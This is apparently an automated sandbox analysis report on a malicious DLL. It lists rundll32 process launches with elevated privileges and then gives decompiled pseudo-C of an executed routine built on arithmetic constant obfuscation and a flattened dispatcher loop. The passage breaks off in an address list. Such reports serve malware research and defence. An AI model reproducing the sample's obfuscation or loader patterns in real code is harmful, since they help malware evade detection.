                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:26
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:27
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5868 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                  Imagebase:0xe90000
                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:33
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,asbiqstaeqzsycc
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:37
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,atwuhkycfybkj
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:43:49
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                  Imagebase:0x7ff6b7590000
                                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:46:03
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:46:03
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:46:14
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uexmfpkplvbbrf\jerrpf.tlt",SfMITlqpKAP
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:46:16
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:46:20
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:46:20
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A6562B() {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				char _v1040;
                                                                                                                                                                                                                    				char _v1560;
                                                                                                                                                                                                                    				signed int _v1564;
                                                                                                                                                                                                                    				signed int _v1568;
                                                                                                                                                                                                                    				signed int _v1572;
                                                                                                                                                                                                                    				signed int _v1576;
                                                                                                                                                                                                                    				signed int _v1580;
                                                                                                                                                                                                                    				signed int _v1584;
                                                                                                                                                                                                                    				signed int _v1588;
                                                                                                                                                                                                                    				signed int _v1592;
                                                                                                                                                                                                                    				signed int _v1596;
                                                                                                                                                                                                                    				signed int _v1600;
                                                                                                                                                                                                                    				signed int _v1604;
                                                                                                                                                                                                                    				signed int _v1608;
                                                                                                                                                                                                                    				signed int _v1612;
                                                                                                                                                                                                                    				signed int _v1616;
                                                                                                                                                                                                                    				signed int _v1620;
                                                                                                                                                                                                                    				signed int _v1624;
                                                                                                                                                                                                                    				signed int _v1628;
                                                                                                                                                                                                                    				signed int _v1632;
                                                                                                                                                                                                                    				signed int _v1636;
                                                                                                                                                                                                                    				signed int _v1640;
                                                                                                                                                                                                                    				signed int _v1644;
                                                                                                                                                                                                                    				signed int _v1648;
                                                                                                                                                                                                                    				signed int _v1652;
                                                                                                                                                                                                                    				signed int _v1656;
                                                                                                                                                                                                                    				signed int _v1660;
                                                                                                                                                                                                                    				signed int _v1664;
                                                                                                                                                                                                                    				signed int _v1668;
                                                                                                                                                                                                                    				signed int _v1672;
                                                                                                                                                                                                                    				signed int _v1676;
                                                                                                                                                                                                                    				signed int _v1680;
                                                                                                                                                                                                                    				signed int _v1684;
                                                                                                                                                                                                                    				signed int _v1688;
                                                                                                                                                                                                                    				signed int _v1692;
                                                                                                                                                                                                                    				signed int _v1696;
                                                                                                                                                                                                                    				signed int _v1700;
                                                                                                                                                                                                                    				signed int _v1704;
                                                                                                                                                                                                                    				unsigned int _v1708;
                                                                                                                                                                                                                    				signed int _v1712;
                                                                                                                                                                                                                    				signed int _t378;
                                                                                                                                                                                                                    				signed short* _t382;
                                                                                                                                                                                                                    				signed int _t387;
                                                                                                                                                                                                                    				signed int _t389;
                                                                                                                                                                                                                    				signed int _t390;
                                                                                                                                                                                                                    				signed int _t391;
                                                                                                                                                                                                                    				signed int _t392;
                                                                                                                                                                                                                    				signed int _t393;
                                                                                                                                                                                                                    				signed int _t394;
                                                                                                                                                                                                                    				signed int _t395;
                                                                                                                                                                                                                    				signed int _t396;
                                                                                                                                                                                                                    				signed int _t404;
                                                                                                                                                                                                                    				signed int* _t434;
                                                                                                                                                                                                                    				void* _t435;
                                                                                                                                                                                                                    				signed short* _t442;
                                                                                                                                                                                                                    				signed int* _t443;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t443 =  &_v1712;
                                                                                                                                                                                                                    				_v1572 = 0xecdf8b;
                                                                                                                                                                                                                    				_v1572 = _v1572 + 0xffff4659;
                                                                                                                                                                                                                    				_v1572 = _v1572 ^ 0x00ec25cd;
                                                                                                                                                                                                                    				_v1668 = 0xf7d17;
                                                                                                                                                                                                                    				_v1668 = _v1668 << 0x10;
                                                                                                                                                                                                                    				_v1668 = _v1668 + 0xffffb7b1;
                                                                                                                                                                                                                    				_v1668 = _v1668 + 0xffffeb7c;
                                                                                                                                                                                                                    				_v1668 = _v1668 ^ 0x7d101408;
                                                                                                                                                                                                                    				_v1568 = 0xda6ff6;
                                                                                                                                                                                                                    				_v1568 = _v1568 + 0x35e7;
                                                                                                                                                                                                                    				_v1568 = _v1568 ^ 0x00d5153a;
                                                                                                                                                                                                                    				_v1700 = 0x16ba6d;
                                                                                                                                                                                                                    				_v1700 = _v1700 << 2;
                                                                                                                                                                                                                    				_t389 = 0x7a;
                                                                                                                                                                                                                    				_t387 = 0;
                                                                                                                                                                                                                    				_v1700 = _v1700 + 0xffffb57a;
                                                                                                                                                                                                                    				_t435 = 0x2dee5ba;
                                                                                                                                                                                                                    				_v1700 = _v1700 / _t389;
                                                                                                                                                                                                                    				_v1700 = _v1700 ^ 0x00020206;
                                                                                                                                                                                                                    				_v1684 = 0x6ab3dc;
                                                                                                                                                                                                                    				_t390 = 0x65;
                                                                                                                                                                                                                    				_v1684 = _v1684 * 0x2e;
                                                                                                                                                                                                                    				_v1684 = _v1684 >> 3;
                                                                                                                                                                                                                    				_v1684 = _v1684 >> 8;
                                                                                                                                                                                                                    				_v1684 = _v1684 ^ 0x000ede84;
                                                                                                                                                                                                                    				_v1708 = 0xf0e613;
                                                                                                                                                                                                                    				_v1708 = _v1708 + 0xaa7f;
                                                                                                                                                                                                                    				_v1708 = _v1708 / _t390;
                                                                                                                                                                                                                    				_v1708 = _v1708 >> 3;
                                                                                                                                                                                                                    				_v1708 = _v1708 ^ 0x0004796a;
                                                                                                                                                                                                                    				_v1648 = 0x16bc7f;
                                                                                                                                                                                                                    				_t391 = 0x1a;
                                                                                                                                                                                                                    				_v1648 = _v1648 / _t391;
                                                                                                                                                                                                                    				_t392 = 9;
                                                                                                                                                                                                                    				_v1648 = _v1648 / _t392;
                                                                                                                                                                                                                    				_v1648 = _v1648 ^ 0x000f12cf;
                                                                                                                                                                                                                    				_v1628 = 0x997916;
                                                                                                                                                                                                                    				_v1628 = _v1628 + 0xffff6940;
                                                                                                                                                                                                                    				_v1628 = _v1628 << 0xa;
                                                                                                                                                                                                                    				_v1628 = _v1628 ^ 0x6388a289;
                                                                                                                                                                                                                    				_v1576 = 0x219ac1;
                                                                                                                                                                                                                    				_v1576 = _v1576 >> 0xa;
                                                                                                                                                                                                                    				_v1576 = _v1576 ^ 0x00048167;
                                                                                                                                                                                                                    				_v1652 = 0xdc84e2;
                                                                                                                                                                                                                    				_v1652 = _v1652 ^ 0x9ea2a8d1;
                                                                                                                                                                                                                    				_v1652 = _v1652 << 4;
                                                                                                                                                                                                                    				_v1652 = _v1652 ^ 0xe7e96501;
                                                                                                                                                                                                                    				_v1632 = 0xb8fdf1;
                                                                                                                                                                                                                    				_v1632 = _v1632 >> 0xd;
                                                                                                                                                                                                                    				_v1632 = _v1632 | 0x2a64588f;
                                                                                                                                                                                                                    				_v1632 = _v1632 ^ 0x2a6e0b2c;
                                                                                                                                                                                                                    				_v1692 = 0x4b4947;
                                                                                                                                                                                                                    				_v1692 = _v1692 << 0xc;
                                                                                                                                                                                                                    				_v1692 = _v1692 << 0x10;
                                                                                                                                                                                                                    				_v1692 = _v1692 >> 8;
                                                                                                                                                                                                                    				_v1692 = _v1692 ^ 0x00717687;
                                                                                                                                                                                                                    				_v1676 = 0x14b46;
                                                                                                                                                                                                                    				_t393 = 0x2c;
                                                                                                                                                                                                                    				_v1676 = _v1676 / _t393;
                                                                                                                                                                                                                    				_t394 = 0x6a;
                                                                                                                                                                                                                    				_v1676 = _v1676 * 0x38;
                                                                                                                                                                                                                    				_v1676 = _v1676 + 0xffff09d4;
                                                                                                                                                                                                                    				_v1676 = _v1676 ^ 0x000585a2;
                                                                                                                                                                                                                    				_v1596 = 0xf7ead7;
                                                                                                                                                                                                                    				_v1596 = _v1596 ^ 0x952712c8;
                                                                                                                                                                                                                    				_v1596 = _v1596 ^ 0x95d30cb5;
                                                                                                                                                                                                                    				_v1608 = 0x6f5ab;
                                                                                                                                                                                                                    				_v1608 = _v1608 << 1;
                                                                                                                                                                                                                    				_v1608 = _v1608 ^ 0x000c09d3;
                                                                                                                                                                                                                    				_v1656 = 0x93ddc;
                                                                                                                                                                                                                    				_v1656 = _v1656 >> 0xf;
                                                                                                                                                                                                                    				_v1656 = _v1656 + 0x1504;
                                                                                                                                                                                                                    				_v1656 = _v1656 ^ 0x000fe805;
                                                                                                                                                                                                                    				_v1620 = 0x130ae9;
                                                                                                                                                                                                                    				_v1620 = _v1620 + 0x5ffc;
                                                                                                                                                                                                                    				_v1620 = _v1620 + 0xffff295a;
                                                                                                                                                                                                                    				_v1620 = _v1620 ^ 0x0017f58f;
                                                                                                                                                                                                                    				_v1588 = 0xa0d63d;
                                                                                                                                                                                                                    				_v1588 = _v1588 * 0x5f;
                                                                                                                                                                                                                    				_v1588 = _v1588 ^ 0x3bacbe53;
                                                                                                                                                                                                                    				_v1640 = 0xca5d2f;
                                                                                                                                                                                                                    				_v1640 = _v1640 + 0x387a;
                                                                                                                                                                                                                    				_v1640 = _v1640 + 0xffffb57a;
                                                                                                                                                                                                                    				_v1640 = _v1640 ^ 0x00c32082;
                                                                                                                                                                                                                    				_v1704 = 0x473069;
                                                                                                                                                                                                                    				_v1704 = _v1704 << 7;
                                                                                                                                                                                                                    				_v1704 = _v1704 ^ 0xe82082eb;
                                                                                                                                                                                                                    				_v1704 = _v1704 + 0xc7a5;
                                                                                                                                                                                                                    				_v1704 = _v1704 ^ 0xcbb9238e;
                                                                                                                                                                                                                    				_v1712 = 0xb1553c;
                                                                                                                                                                                                                    				_v1712 = _v1712 << 5;
                                                                                                                                                                                                                    				_v1712 = _v1712 << 9;
                                                                                                                                                                                                                    				_v1712 = _v1712 ^ 0xc7f974c6;
                                                                                                                                                                                                                    				_v1712 = _v1712 ^ 0x92bae93a;
                                                                                                                                                                                                                    				_v1580 = 0xc43326;
                                                                                                                                                                                                                    				_v1580 = _v1580 / _t394;
                                                                                                                                                                                                                    				_v1580 = _v1580 ^ 0x000ec8ee;
                                                                                                                                                                                                                    				_v1564 = 0x8ff430;
                                                                                                                                                                                                                    				_v1564 = _v1564 + 0xffff0864;
                                                                                                                                                                                                                    				_v1564 = _v1564 ^ 0x008d454a;
                                                                                                                                                                                                                    				_v1696 = 0x9c8c84;
                                                                                                                                                                                                                    				_v1696 = _v1696 + 0xfffff36a;
                                                                                                                                                                                                                    				_v1696 = _v1696 ^ 0x778ff6c0;
                                                                                                                                                                                                                    				_v1696 = _v1696 ^ 0x6de48752;
                                                                                                                                                                                                                    				_v1696 = _v1696 ^ 0x1afda5e4;
                                                                                                                                                                                                                    				_v1604 = 0x5c4eaa;
                                                                                                                                                                                                                    				_v1604 = _v1604 | 0xd0ea98f4;
                                                                                                                                                                                                                    				_v1604 = _v1604 ^ 0xd0f65d99;
                                                                                                                                                                                                                    				_v1644 = 0x40885f;
                                                                                                                                                                                                                    				_v1644 = _v1644 >> 2;
                                                                                                                                                                                                                    				_v1644 = _v1644 + 0xae9f;
                                                                                                                                                                                                                    				_v1644 = _v1644 ^ 0x0015bedb;
                                                                                                                                                                                                                    				_v1660 = 0xa1b9ad;
                                                                                                                                                                                                                    				_v1660 = _v1660 * 0x14;
                                                                                                                                                                                                                    				_v1660 = _v1660 ^ 0xa7728bb7;
                                                                                                                                                                                                                    				_v1660 = _v1660 ^ 0xabd76ce8;
                                                                                                                                                                                                                    				_v1592 = 0x1fcb36;
                                                                                                                                                                                                                    				_v1592 = _v1592 + 0x2fd7;
                                                                                                                                                                                                                    				_v1592 = _v1592 ^ 0x001e310a;
                                                                                                                                                                                                                    				_v1600 = 0xbc4ac;
                                                                                                                                                                                                                    				_v1600 = _v1600 ^ 0x595387ed;
                                                                                                                                                                                                                    				_v1600 = _v1600 ^ 0x595db7d4;
                                                                                                                                                                                                                    				_v1624 = 0x4ecc39;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0xec42c17a;
                                                                                                                                                                                                                    				_v1624 = _v1624 + 0x9bdf;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0xec04ba3e;
                                                                                                                                                                                                                    				_v1636 = 0x7c466d;
                                                                                                                                                                                                                    				_v1636 = _v1636 + 0xffff9ee8;
                                                                                                                                                                                                                    				_v1636 = _v1636 | 0x6f195f12;
                                                                                                                                                                                                                    				_v1636 = _v1636 ^ 0x6f7a5688;
                                                                                                                                                                                                                    				_v1680 = 0x7758f2;
                                                                                                                                                                                                                    				_v1680 = _v1680 + 0x96c1;
                                                                                                                                                                                                                    				_v1680 = _v1680 | 0xbfeebfbd;
                                                                                                                                                                                                                    				_v1680 = _v1680 ^ 0xbff2db47;
                                                                                                                                                                                                                    				_v1688 = 0x92047c;
                                                                                                                                                                                                                    				_v1688 = _v1688 >> 0xe;
                                                                                                                                                                                                                    				_t395 = 0x78;
                                                                                                                                                                                                                    				_v1688 = _v1688 * 0x29;
                                                                                                                                                                                                                    				_v1688 = _v1688 + 0xffff815a;
                                                                                                                                                                                                                    				_v1688 = _v1688 ^ 0xfff314ed;
                                                                                                                                                                                                                    				_v1584 = 0xc35679;
                                                                                                                                                                                                                    				_v1584 = _v1584 + 0xf955;
                                                                                                                                                                                                                    				_v1584 = _v1584 ^ 0x00cf1101;
                                                                                                                                                                                                                    				_v1612 = 0x484e22;
                                                                                                                                                                                                                    				_v1612 = _v1612 ^ 0xc4a238d4;
                                                                                                                                                                                                                    				_v1612 = _v1612 ^ 0xc4e23e67;
                                                                                                                                                                                                                    				_v1664 = 0xbadfe4;
                                                                                                                                                                                                                    				_v1664 = _v1664 + 0xffffc55f;
                                                                                                                                                                                                                    				_v1664 = _v1664 << 8;
                                                                                                                                                                                                                    				_t442 = _v1612;
                                                                                                                                                                                                                    				_v1664 = _v1664 / _t395;
                                                                                                                                                                                                                    				_v1664 = _v1664 ^ 0x018ae489;
                                                                                                                                                                                                                    				_v1672 = 0x122783;
                                                                                                                                                                                                                    				_t396 = 0x55;
                                                                                                                                                                                                                    				_v1672 = _v1672 / _t396;
                                                                                                                                                                                                                    				_v1672 = _v1672 | 0xbbbf6de7;
                                                                                                                                                                                                                    				_v1672 = _v1672 ^ 0xbbbb940c;
                                                                                                                                                                                                                    				_v1616 = 0x9f18bc;
                                                                                                                                                                                                                    				_t397 = 0x26;
                                                                                                                                                                                                                    				_v1616 = _v1616 / _t397;
                                                                                                                                                                                                                    				_v1616 = _v1616 ^ 0x149abeb9;
                                                                                                                                                                                                                    				_v1616 = _v1616 ^ 0x149a36f2;
                                                                                                                                                                                                                    				while(_t435 != 0xaeb272) {
                                                                                                                                                                                                                    					if(_t435 == 0x14f52a4) {
                                                                                                                                                                                                                    						_push(_v1652);
                                                                                                                                                                                                                    						_push(_v1576);
                                                                                                                                                                                                                    						_push(_v1628);
                                                                                                                                                                                                                    						_t378 = E00A66877(_v1632,  &_v1560, _v1692, E00A81E60(0xa6118c, _v1648, __eflags)); // executed
                                                                                                                                                                                                                    						_t397 = _v1676;
                                                                                                                                                                                                                    						asm("sbb edi, edi");
                                                                                                                                                                                                                    						_t435 = ( ~_t378 & 0xf5b7d198) + 0xaf6e0da;
                                                                                                                                                                                                                    						E00A7D6DF(_v1676, _t377, _v1596, _v1608);
                                                                                                                                                                                                                    						_t443 =  &(_t443[7]);
                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						if(_t435 == 0x2dee5ba) {
                                                                                                                                                                                                                    							_t397 = _v1668;
                                                                                                                                                                                                                    							E00A73FA6(_v1668, 0x208,  &_v1560, _v1568, _v1700, _v1684);
                                                                                                                                                                                                                    							_t443 =  &(_t443[4]);
                                                                                                                                                                                                                    							_t435 = 0xccf0ead;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t435 == 0x3f10a4c) {
                                                                                                                                                                                                                    								_t382 = _t442;
                                                                                                                                                                                                                    								__eflags =  *_t442 - _t387;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									_t397 = 0x2c;
                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                    										__eflags =  *_t382 - _t397;
                                                                                                                                                                                                                    										if( *_t382 == _t397) {
                                                                                                                                                                                                                    											_t434 =  &_v1560;
                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                    												_t382 =  &(_t382[1]);
                                                                                                                                                                                                                    												_t404 =  *_t382 & 0x0000ffff;
                                                                                                                                                                                                                    												__eflags = _t404;
                                                                                                                                                                                                                    												if(_t404 == 0) {
                                                                                                                                                                                                                    													break;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    												__eflags = _t404 - 0x20;
                                                                                                                                                                                                                    												if(_t404 != 0x20) {
                                                                                                                                                                                                                    													 *_t434 = _t404;
                                                                                                                                                                                                                    													_t434 =  &(_t434[0]);
                                                                                                                                                                                                                    													__eflags = _t434;
                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    												break;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                                                                    											 *_t434 = 0;
                                                                                                                                                                                                                    											_t397 = 0x2c;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    										_t382 =  &(_t382[1]);
                                                                                                                                                                                                                    										__eflags =  *_t382 - _t387;
                                                                                                                                                                                                                    									} while (__eflags != 0);
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_t435 = 0x14f52a4;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t435 == 0x584c784) {
                                                                                                                                                                                                                    									_push(_t387);
                                                                                                                                                                                                                    									_push(_t387);
                                                                                                                                                                                                                    									_push(_t387);
                                                                                                                                                                                                                    									_push(_v1616);
                                                                                                                                                                                                                    									_push(_t442);
                                                                                                                                                                                                                    									_push(_v1672);
                                                                                                                                                                                                                    									_push(_v1664);
                                                                                                                                                                                                                    									E00A7E05C(_v1612, __eflags);
                                                                                                                                                                                                                    									_t387 = 1;
                                                                                                                                                                                                                    									__eflags = 1;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t435 != 0xccf0ead) {
                                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                                    										__eflags = _t435 - 0xaf6e0da;
                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_t442 = E00A7398C(_t397);
                                                                                                                                                                                                                    										_t435 = 0x3f10a4c;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					return _t387;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				E00A7E4D8(_v1656, _v1620, _t397, _t397, _v1588, _t397, _v1572,  &_v1040, _v1640); // executed
                                                                                                                                                                                                                    				E00A6D804(_v1704, _v1712,  &_v520, _v1656, _v1580, _v1564);
                                                                                                                                                                                                                    				_push(_v1660);
                                                                                                                                                                                                                    				_push(_v1644);
                                                                                                                                                                                                                    				_push(_v1604);
                                                                                                                                                                                                                    				E00A7E773(_v1600, __eflags,  &_v520, _v1624, 0xa6121c, _t442, E00A81E60(0xa6121c, _v1696, __eflags),  &_v1040, _v1636);
                                                                                                                                                                                                                    				_t397 = _v1680;
                                                                                                                                                                                                                    				E00A7D6DF(_v1680, _t372, _v1688, _v1584);
                                                                                                                                                                                                                    				_t443 =  &(_t443[0x17]);
                                                                                                                                                                                                                    				_t435 = 0x584c784;
                                                                                                                                                                                                                    				goto L21;
                                                                                                                                                                                                                    			}




























































                                                                                                                                                                                                                    0x00a6562b
                                                                                                                                                                                                                    0x00a65631
                                                                                                                                                                                                                    0x00a6563e
                                                                                                                                                                                                                    0x00a65649
                                                                                                                                                                                                                    0x00a65654
                                                                                                                                                                                                                    0x00a6565c
                                                                                                                                                                                                                    0x00a65661
                                                                                                                                                                                                                    0x00a65669
                                                                                                                                                                                                                    0x00a65671
                                                                                                                                                                                                                    0x00a65679
                                                                                                                                                                                                                    0x00a65684
                                                                                                                                                                                                                    0x00a6568f
                                                                                                                                                                                                                    0x00a6569a
                                                                                                                                                                                                                    0x00a656a2
                                                                                                                                                                                                                    0x00a656ad
                                                                                                                                                                                                                    0x00a656b3
                                                                                                                                                                                                                    0x00a656b5
                                                                                                                                                                                                                    0x00a656b9
                                                                                                                                                                                                                    0x00a656c6
                                                                                                                                                                                                                    0x00a656cc
                                                                                                                                                                                                                    0x00a656d4
                                                                                                                                                                                                                    0x00a656e1
                                                                                                                                                                                                                    0x00a656e4
                                                                                                                                                                                                                    0x00a656e8
                                                                                                                                                                                                                    0x00a656ed
                                                                                                                                                                                                                    0x00a656f2
                                                                                                                                                                                                                    0x00a656fa
                                                                                                                                                                                                                    0x00a65702
                                                                                                                                                                                                                    0x00a65712
                                                                                                                                                                                                                    0x00a65716
                                                                                                                                                                                                                    0x00a6571b
                                                                                                                                                                                                                    0x00a65723
                                                                                                                                                                                                                    0x00a6572f
                                                                                                                                                                                                                    0x00a65734
                                                                                                                                                                                                                    0x00a6573e
                                                                                                                                                                                                                    0x00a65741
                                                                                                                                                                                                                    0x00a65745
                                                                                                                                                                                                                    0x00a6574d
                                                                                                                                                                                                                    0x00a65755
                                                                                                                                                                                                                    0x00a6575d
                                                                                                                                                                                                                    0x00a65762
                                                                                                                                                                                                                    0x00a6576a
                                                                                                                                                                                                                    0x00a65775
                                                                                                                                                                                                                    0x00a6577d
                                                                                                                                                                                                                    0x00a65788
